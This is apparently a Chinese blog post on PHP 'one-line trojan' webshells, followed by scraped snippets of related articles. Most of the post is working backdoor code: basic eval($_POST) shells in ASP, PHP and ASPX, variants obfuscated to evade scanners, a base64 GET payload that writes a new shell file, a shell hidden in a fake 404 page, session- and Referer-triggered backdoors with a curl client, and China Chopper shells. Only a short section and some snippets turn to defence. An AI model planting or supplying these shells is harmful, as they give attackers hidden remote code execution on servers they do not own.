PHP一句话木马后门

最新推荐文章于 2025-07-14 18:11:18 发布
最新推荐文章于 2025-07-14 18:11:18 发布
阅读量1.8k 收藏 4
点赞数
分类专栏: Web Security 文章标签: webshell web后门

在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。

一句话木马的原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去隐蔽特征,而白帽则不断的更新过滤方法,建起更高的城墙。

 

一、原理简述

对于不同的语言有不同的构造方法。

  • 基本构造:最开头构造的是脚本开始的标记
  • 核心部分:获取并执行得到的内容,通常类似eval、execute等
  • 被执行内容:一般是http等协议接受的值,通常类似request、$_POST等

如果我们通过客户端向服务器发送被执行内容,那么就会让服务器执行我们发送的脚本,挂马就实现了。

/*asp一句话木马*/
<%execute(request("value"))%>

/*php一句话木马*/
<?php @eval($_POST[value]);?>

/*aspx一句话木马*/
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>

黑帽子的目的,就是想尽办法给目标网站插入这么一段会被储存起来的语句。可以是一个单独的脚本文件文件(.asp 、.php、.aspx ),或者是隐藏在某些网页下的文件、代码等。其中的value 就是客户端要发送的内容,然后通过客户端与服务器建立连接,发送控制脚本。也会涉及到一些任意文件上传漏洞等。

 

二、简单变形

很明显的 eval 可以成为一个静态特征码,webshell扫描工具可以以此为关键词,扫描到这种木马加以屏蔽。于是可以简单变形不出现eval:

<?php $_GET['a']($_POST['b'])?>

同理,传给a值为 @base64_decode(base64编码过后的eval)。

<?php $_GET['a']($_GET['b']);?>

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

通过对GET请求的URL构造而形成利用,左括号和右括号是URL编码,解码回来如下:

?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};

PHP接收到GET请求后相当于执行一个assert函数,并把b作为assert的参数。b里面使用略php的base64解码函数,把部分信息通过base64编码而绕过扫描,解码后如下:

?a=assert&b=${fputs(fopen(c.php,w),<?php @eval($_POST[c]); ?>1)};

执行后当前目录生成c.php文件并写入一句话木马,这已经算是一个非常隐蔽的木马了。而在PHP 后门的变形之路上,远远不止这些,甚至可以自己定义一个加密解密的函数,或者是利用xor, 字符串翻转,压缩,截断重组等等方法来绕过。

 

三、变形改良

1. 404页面隐藏木马

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
	<head>
		<title>404 Not Found</title>
	</head>
	<body>
		<h1>Not Found</h1>
		<p>The requested URL was not found on this server.</p>
	</body>
</html>
<?php
	@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
	header('HTTP/1.1 404 Not Found');
?>

一般404页面放好后,很少有人会定期对404页面进行检查和修改。如果在404页面挂上了一句话后门,一方面不会被发现,另一方面,黑帽子很容易能定位到并连接上服务器。

 

2.无特征隐藏PHP后门

利用session:

<?php

    session_start();
    $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
    $_SESSION['theCode'] && preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

利用$_SEESION变量来绕过扫描,将$_POST['code']赋值给$_SESSION['theCode'],然后eval执行SESSION的内容。

利用HTTP_REFERER:

利用请求中的HTTP_REFERER来运行经过base64编码的代码,达到后门的效果,使用两个文件。

<?php

    //1.php
    header('Content-type:text/html;charset=utf-8');
    parse_str($_SERVER['HTTP_REFERER'], $a);
    if(reset($a) == '10' && count($a) == 9) {
        eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
    }
<?php

    //2.php
    header('Content-type:text/html;charset=utf-8');
    
    //要执行的代码
    $code = <<<CODE
        phpinfo();
CODE;

    //进行base64编码
    $code = base64_encode($code);
    
    //构造referer字符串
    $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
    
    //后门url
    $url = 'http://localhost/test1/1.php';
    $ch = curl_init();
    $options = [
        CURLOPT_URL    => $url,
        CURLOPT_HEADER => FALSE,
        CURLOPT_RETURNTRANSFER => TRUE,
        CURLOPT_REFERER => $referer
    ];
    curl_setopt_array($ch, $options);
    echo curl_exec($ch);

访问2.php,会构造一个会话,进到后门1.php那里。然后在HTTP_REFERER 的内容也会传递给1.php,通过1.php 执行内容。一般来说,防火墙会对 referer字段宽松一些,就可造成绕过。

3.常见的后门

//菜刀一句话
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");

//危险的include函数,直接编译任何文件为php格式运行
$filename=$_GET['xbid'];
include ($filename);

//重命名任何文件
$reg="c"."o"."p"."y";
$reg($_FILES['MyFile']['tmp_name'],$_FILES['MyFile']['name']);

//菜刀一句话
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");

//gif插一句话
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
include ($uid);

//典型一句话
<?php eval_r($_POST['s'])?>
<?php @eval_r($_POST['s'])?>

//使用lanker一句话客户端的专家模式执行相关的php语句
<?php assert($_POST['s']);?>

<?$_POST['a']($_POST['b']);?>
<?$_POST['a']($_POST['b'],$_POST['c'])?>

//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
    
<O>h=@eval_r($_POST1);</O>

//绕过<?限制的一句话
<script language="php">@eval_r($_POST[sb])</script>

四、攻防

攻方:利用各种各样的绕过姿势,都是试图让扫描工具无效。

守方:分析各种各样的函数,寻找有效的特征码来防止后门。

黑帽子大牛:深入web框架内核,挖掘出代码缺陷,构造出复杂的后门利用。

安全审计人员:对那些通过GET,POST 获取的超全局变量,进行细致的追踪,构造合适的过滤器。

语义分析:对GET POST 等获取的值进行污染点追踪,以确保这些用户可控的值,不会未经过滤就得到了执行,或是进入数据库中。

针对超全局变量进行语义分析:

  • $_GET
  • $_POST
  • $_REQUEST
  • $_SERVER
  • $_FILES
  • $_COOKIE
  • $_SESSION
  • $_ENV
  • $GLOBALS
php中fputs写入句话,phpmyadmin写入句话木马的测试
weixin_42525387的博客
03-11 1072
方法句话木马偶尔拿到个config中,发现是root,且还有phpmyadmin。好吧,试试select''INTOOUTFILE'E:\Web\wp-content\errors.php'提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题接着尝试:select''INTOOUTFILE'E:\\Web\\xxx.xx.vn\\wp-content\\error...
句话木马过狗 php,ASP/PHP句话木马过安全狗等杀软
weixin_28933797的博客
03-09 1414
站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。整理些常用的PHP、ASP、jsp常用到的句话木马,部分过安全狗、D盾。看多了之后 自然可以干掉木马……PHP句话木马1、$hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$h...
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
那些强悍的PHP句话后门
weixin_30338461的博客
05-11 2045
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数些有意思的PHP句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 ...
句话木马原理
最新发布
qq_74211710的博客
07-14 263
本文简要介绍了句话木马的工作原理。典型的句话木马代码为<?php@eval($_POST['cmd']);?>,其中@抑制错误输出,eval()执行字符串形式的PHP代码,$_POST['cmd']获取POST请求参数。木马作为桥梁,只响应带cmd参数的POST请求。使用时需要知道木马文件位置并发送指定格式的请求,如蚁剑连接时需提供木马URL和cmd参数。木马接收命令后执行并将结果通过HTTP响应返回。这种机制实现了远程控制功能。
.user.ini文件构成的PHP后门(转)
weixin_30906425的博客
12-29 387
phith0n · 2014/10/30 10:51 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的...
PHP句话后门
xyang
05-26 3218
404 Not Found Not Found The requested URL was not found on this server. <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
php实现批量查询清除句话后门的代码
10-30
句话后门种常见的网页木马攻击方式,攻击者通过在网页代码中插入段简短的恶意代码来获取网站的控制权。因其代码简短,隐蔽性强,所以很难被发现,并且危害巨大。 首先,文档中提到了个名为Xall.php的文件...
php简短句话木马免杀,免杀/句话木马(PHP)
weixin_39598568的博客
03-13 2823
前言在打CTF或渗透时,经常会遇到waf,普通的句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握句话木马的免杀。Webshell检测方式网上有很多免杀的句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下个payload。因此在此之前,先来了解下都有哪些检测方式。日志检测使用Web...
php句话木马连菜刀,如何基于菜刀PHP句话实现单个文件批量上传?
weixin_35741494的博客
03-09 2086
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临个问题,使用菜刀个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php句话为例来分析下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过句话木马来实现web服务器的文件管理的。下面是最常见...
php句话后门分析
xiaoshan812613234的专栏
12-05 1479
1.eval  eval用法:  eval() 函数把字符串按照 PHP 代码来计算  该字符串必须是合法的 PHP 代码,且必须以分号结尾。  如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。  <?php eval ($_POST[jusker]); ?> 2.assert  Assert用法:
php句话后门,PHP句话后门集锦
weixin_42436686的博客
03-10 775
404页面的利用:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>404页面是网站常用的文件,般建议好后很少有人会去对它进...
php句话后门是哪个,PHP句话后门
weixin_33873270的博客
03-28 278
1、利用404页面隐藏句话404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>2、无特征隐藏句话session_start(...
php句话后门学习(含免杀)
qq_50854662的博客
05-21 1409
php句话后门 开发很久的可利用函数 eval和assert php任意代码执行的句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_POST['a']) ?> 但由于eval不能拆分,早期也有人喜欢用assert,这样通过编码和拆分assert,隐蔽性更高 <?php @assert($_POST['a']) ?> 虽然有人说assert在php7.0及其以上版本被禁用,但实际上并没有禁用,而是和eval样禁止拆分了。 绝大部分
php后门木马常用命令
weixin_34242331的博客
04-19 376
2019独角兽企业重金招聘Python工程师标准>>> ...
句话木马的原理
ilovey4的专栏
05-28 985
句话木马”服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改“句话木马”客户端用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件句话木马客户端源文件
有关句话后门
caiguazheng4921的博客
04-19 155
来源:安天团队 收集:X.DW 般来说就是针对有输入接口的地方插入句话后门如下面所示:(1)<%eval request("#")%>(2)转换后的代码%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%23%22%29%25%3E 63字节(3)通过echo命令 echo ^<^%eval requ...
php句话木马
03-22
### PHP句话木马的原理 PHP句话木马是种简单的后门程序,它可以通过HTTP请求执行任意命令或脚本。这类木马的核心在于`eval()`函数的应用,该函数可以动态地评估并运行传入字符串中的PHP代码[^3]。例如: ```php <?php @eval($_GET["code"]);?> ``` 上述代码片段展示了最基础的句话木马形式。攻击者通过向URL参数传递恶意代码来实现远程控制服务器的功能。 --- ### 防御措施 #### 1. **防止代码注入** 由于句话木马通常是通过代码注入方式植入目标系统的,因此加强输入验证是至关重要的步。开发者应确保所有外部数据都经过严格的过滤和转义处理,避免潜在的恶意代码被执行[^2]。 #### 2. **固定PHP访问入口** 为了减少句话木马的风险,可以通过Web服务器配置限制合法的PHP文件访问路径。例如,在Nginx中设置如下规则可有效阻止未经授权的PHP文件执行: ```nginx # 只允许index.php作为唯入口 location ~ .*/index\.(php)$ { fastcgi_pass 127.0.0.1:9000; } # 拒绝其他所有的PHP文件访问 location ~* .*\.(php)$ { deny all; } ``` 此配置能够显著降低非法PHP脚本被加载的可能性[^4]。 #### 3. **禁用危险函数** 在PHP环境中,某些内置函数可能成为句话木马实施攻击的重要工具,比如`eval()`, `exec()`, 和`system()`等。建议在生产环境下禁用这些高风险函数。可以在`php.ini`中添加以下配置项: ```ini disable_functions = eval, exec, system, shell_exec, passthru, popen, proc_open ``` 这样即使存在漏洞,也能极大程度上削弱攻击者的操作能力。 #### 4. **定期更新与补丁管理** 保持软件版本最新对于抵御已知威胁至关重要。无论是操作系统还是应用程序框架都需要及时安装官方发布的安全修复包[^1]。 #### 5. **强化权限管理** 遵循最小权限原则分配给Web服务进程必要的资源访问权能有效遏制旦发生入侵后的损害范围扩展。例如Linux下的Apache/Nginx应该以低特权用户身份运行而不是root账户。 #### 6. **日志监控与异常检测** 建立完善的日志记录机制可以帮助快速发现可疑活动迹象;同时部署专业的WAF(Web Application Firewall)产品或者IDS(Intrusion Detection System),它们能够在定程度上识别并拦截尝试上传或触发此类恶意脚本的行为。 --- ### 结论 综上所述,虽然PHP句话木马看似结构简单却蕴含巨大破坏力,但只要采取合理的预防手段就可以将其危害降到最低水平。这不仅依赖技术层面的努力还需要持续的安全意识培养工作贯穿整个团队之中。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值